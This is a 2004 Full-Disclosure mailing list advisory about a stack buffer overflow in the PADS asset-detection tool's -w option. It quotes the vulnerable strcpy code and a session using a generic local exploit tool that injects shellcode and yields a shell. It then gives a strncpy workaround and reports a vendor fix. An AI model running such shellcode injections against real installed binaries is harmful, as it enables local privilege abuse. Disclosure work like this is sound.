[Full-Disclosure] PADS Simple Stack Overflow

Pads Stack Overflow Advisory

---[ Vulnerable Application ]---

Pads - Passive Asset Detection System
(from the README ^)
http://passive.sourceforge.net/

Vulnerable to a stack overflow.

---[ Vulnerable Code ]---

 From pads.c

<code snip>

......

char report_file[255] = "assets.csv";

.........

case 'w':
       strcpy(report_file, optarg);
       break;
............

</code snip>

Very simple stack overflow. Can be exploited locally with
www.cr-secure.net/ex_bof.c (a lazy mans local exploit).

_______________________________________________-
/> ex_bof
Please enter the values as requested . . .
Enter the vulnerable program path: pads
Enter the vulnerable program name: pads
Enter any arguments the program requires: -w
Enter an offset: 0
Enter a buffer size: 600
Enter the nop sled size: 400

The Return Value Is: 0xbffff8b8
Injecting Shellcode . . .

pads - Passive Asset Detection System
v1.1 - 08/14/04
Matt Shelton <matt@mattshelton.com>

sh-3.00$ id
uid=1000(chris) gid=1000(chris)
groups=20(dialout),24(cdrom),25(floppy),1000(chris)
sh-3.00$
________________________________________________

This is typically only a big deal if 'pads' is uid=0. Which it is not by
default when compiled from source,
which is how I built it. Very low danger here.

---[ Temporary work around ]---

Well for now you could change strcpy() to

.......
strncpy(report_file, optarg, 255); // still not very secure, its
a 'workaround'
.......

Matt Shelton (author) was notified of this, a new version 1.1.1 is now
available. Pads is still a beta
application but shows a lot of promise. Check it out. The link is at the
top of this advisory.

---[ Hello ]---

Mattjf && tlharris && Think && others

www.cr-secure.net
chris@cr-secure.net
ChrisR-

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Received on Wed Aug 18 21:24:16 2004